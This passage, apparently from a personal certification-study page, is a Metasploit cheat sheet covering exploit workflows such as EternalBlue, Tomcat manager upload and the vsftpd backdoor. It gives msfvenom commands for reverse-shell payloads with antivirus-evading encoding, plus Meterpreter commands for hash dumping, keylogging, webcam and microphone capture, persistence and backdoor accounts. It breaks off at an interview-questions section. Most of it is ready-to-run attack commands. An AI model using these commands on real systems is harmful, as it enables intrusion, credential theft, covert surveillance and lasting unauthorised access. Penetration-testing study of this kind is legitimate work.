My certifications and learning journey.
METASPLOIT - Complete Exploitation Framework Guide
Penetration Testing Framework: Discover, exploit, and post-exploit vulnerabilities Table of Contents What is Metasploit? Installation Core Concepts Basic Workflow Common Exploits Meterpreter Commands Post-Exploitation Interview Questions What is Metasploit? Metasploit is the most powerful penetration testing framework. It allows you to: Scan networks for vulnerabilities Exploit vulnerabilities automatically Generate custom payloads Establish reverse shells Escalate privileges Extract credentials Maintain persistence Post-exploitation activities Versions: Metasploit Framework (Free) Metasploit Pro (Paid, more features) Installation Kali Linux (Pre-installed) # Start Metasploit service sudo systemctl start postgresql sudo systemctl start metasploit # Or manually sudo service postgresql start sudo msfconsole Ubuntu/Debian # Install dependencies sudo apt-get install postgresql libpq-dev # Install Metasploit curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/base/install.sh | bash # Or from GitHub git clone https://github.com/rapid7/metasploit-framework.git cd metasploit-framework bundle install ./msfconsole macOS brew install metasploit-framework Start Metasploit # Start with database sudo msfconsole # Start without database msfconsole -q Core Concepts Modules Exploit: Attack code targeting specific vulnerability Payload: Code executed after successful exploitation Encoder: Obfuscates payload to evade detection Evasion: Techniques to bypass security controls Auxiliary: Scanning, enumeration, fuzzing Post: Post-exploitation modules Payloads Types: - Staged: Download stage 2 (small initial) - Non-staged: Everything in one payload (larger) Common payloads: - windows/meterpreter/reverse_tcp (Windows shell) - linux/x86/meterpreter/reverse_tcp (Linux shell) - php/meterpreter/reverse_tcp (PHP shell) - android/meterpreter/reverse_http (Android shell) - cmd/unix/reverse_sh (Linux shell) LHOST & LPORT LHOST: Your attacker machine IP LPORT: Port where reverse shell connects back to you Example: LHOST: 192.168.1.50 (Your IP) LPORT: 4444 (Your listening port) Victim connects back: 192.168.1.50:4444 Basic Workflow Step 1: Start Metasploit sudo msfconsole Step 2: Search for Exploit msf> search type:exploit platform:windows eternalblue msf> search type:exploit apache # Shows results: # Name: exploit/windows/smb/ms17_010_eternalblue # Rank: Great # Path: /path/to/exploit Step 3: Select Exploit msf> use exploit/windows/smb/ms17_010_eternalblue Step 4: Show Options msf exploit(ms17_010_eternalblue)> show options # Output: # Name Current Setting Required Description # RHOSTS yes Target host(s) # PAYLOAD windows/meterpreter/reverse_tcp # LHOST 192.168.1.50 yes Attacker IP # LPORT 4444 yes Listener port Step 5: Set Options msf> set RHOSTS 192.168.1.100 msf> set LHOST 192.168.1.50 msf> set LPORT 4444 msf> set PAYLOAD windows/meterpreter/reverse_tcp Step 6: Show Advanced Options msf> show advanced # Shows timeout, threading, encoding options Step 7: Exploit! msf> exploit # Or run in background: msf> exploit -j # Check jobs: msf> jobs -l # Interact with session: msf> sessions -i 1 Common Exploits EternalBlue (Windows SMB RCE) # Most famous exploit # Affects Windows 7, 8, 8.1, 10, Server 2008, 2012, 2016 msf> use exploit/windows/smb/ms17_010_eternalblue msf> set RHOSTS 192.168.1.100 msf> set LHOST 192.168.1.50 msf> exploit # Creates reverse meterpreter shell # Access Windows target completely Apache Struts CVE-2017-5645 # Web server vulnerability # Remote code execution msf> use exploit/multi/http/struts2_rce_cve_2017_5645 msf> set RHOSTS 192.168.1.100 msf> set LHOST 192.168.1.50 msf> exploit vsftpd Backdoor # FTP server vulnerability msf> use exploit/unix/ftp/vsftpd_234_backdoor msf> set RHOSTS 192.168.1.100 msf> exploit # Shell access to Linux Tomcat Manager Upload # Tomcat weak credentials msf> use exploit/multi/http/tomcat_mgr_upload msf> set RHOSTS 192.168.1.100 msf> set HttpUsername admin msf> set HttpPassword admin msf> exploit Payload Generation (msfvenom) Basic Syntax msfvenom -p [PAYLOAD] LHOST=[IP] LPORT=[PORT] -f [FORMAT] -o [OUTPUT] Windows Payloads # Reverse shell (TCP) msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f exe -o shell.exe # Bind shell (listen on target) msfvenom -p windows/meterpreter/bind_tcp LPORT=4444 -f exe -o shell.exe # Staged payload (smaller size) msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f exe -o shell.exe # With encoding (evade antivirus) msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -e x86/shikata_ga_nai -i 10 -f exe -o shell.exe # As batch file msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f batch -o shell.bat Linux Payloads # ELF executable msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f elf -o shell # Shell script msfvenom -p cmd/unix/reverse_bash LHOST=192.168.1.50 LPORT=4444 -f sh -o shell.sh # Python payload msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f python -o shell.py PHP Payloads # PHP reverse shell msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f php -o shell.php # Embed in existing PHP msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f php -o shell.txt Android Payloads # APK reverse shell msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -o shell.apk Meterpreter Commands Navigation & System Info pwd # Current directory cd /path/to/dir # Change directory ls -la # List files cat /etc/passwd # Read file contents whoami # Current user uname -a # System information hostname # Computer name ipconfig (or ifconfig) # IP configuration File Operations upload /path/local/file /path/remote/location # Upload file download /path/remote/file /path/local/loc # Download file rm /path/file # Delete file mkdir /path/newdir # Create directory Process Management ps # List processes kill [PID] # Kill process getpid # Current process ID migrate [PID] # Move to another process (stealth) Credential Dumping hashdump # Dump SAM hashes (Windows) lsa_dump_sam # Dump LSASS secrets getsystem # Escalate to SYSTEM Keylogging keyscan_start # Start keystroke logging keyscan_dump # Show captured keystrokes keyscan_stop # Stop logging Screenshot & Screen Capture screenshot # Take screenshot record_mic [SECONDS] # Record audio webcam_snap # Capture webcam photo webcam_stream # Stream webcam Reverse Shell & Tunneling shell # Drop to system shell execute -i -c cmd # Execute command interactive portfwd add -l [PORT] -p [REMOTE_PORT] -r [TARGET] # Port forwarding Persistence persistence -X # Run at startup persistence -U # Scheduled task run scheduler -e # Schedule execution reg setval -k path -v name -d data # Set registry (Windows) Post-Exploitation Windows Post-Exploitation # Escalate to SYSTEM getsystem # Dump Windows hashes hashdump # Create backdoor user run persistence -X # Extract saved passwords run windows_enum_ad run winenum # Start keylogger keyscan_start keyscan_dump Linux Post-Exploitation # Check sudo rights sudo -l # Find SUID binaries find / -perm -4000 2>/dev/null # Check cron jobs cat /etc/crontab find /var/spool/cron -type f # Create backdoor account useradd -m backdoor echo 'backdoor:password' | chpasswd # SSH key persistence echo 'PUBLIC_KEY' >> ~/.ssh/authorized_keys Information Gathering Post-Exploitation # Network configuration ifconfig / ipconfig # Routing table route # Active connections netstat -an # ARP table arp -a # Open ports ss -tulpn # Running services ps aux Real-World Workflow Complete Exploitation Scenario 1. SCANNING msf> use auxiliary/scanner/smb/smb_version msf> set RHOSTS 192.168.1.0/24 msf> run # Find vulnerable Windows 7 2. SELECT EXPLOIT msf> use exploit/windows/smb/ms17_010_eternalblue 3. SET OPTIONS msf> set RHOSTS 192.168.1.100 msf> set LHOST 192.168.1.50 msf> set PAYLOAD windows/meterpreter/reverse_tcp 4. EXPLOIT msf> exploit 5. POST-EXPLOITATION meterpreter> hashdump meterpreter> getsystem meterpreter> keyscan_start meterpreter> persistence -X meterpreter> record_mic 10 Interview Questions & Answers Q1: What’s the difference between staged and non-staged payloads? A: ...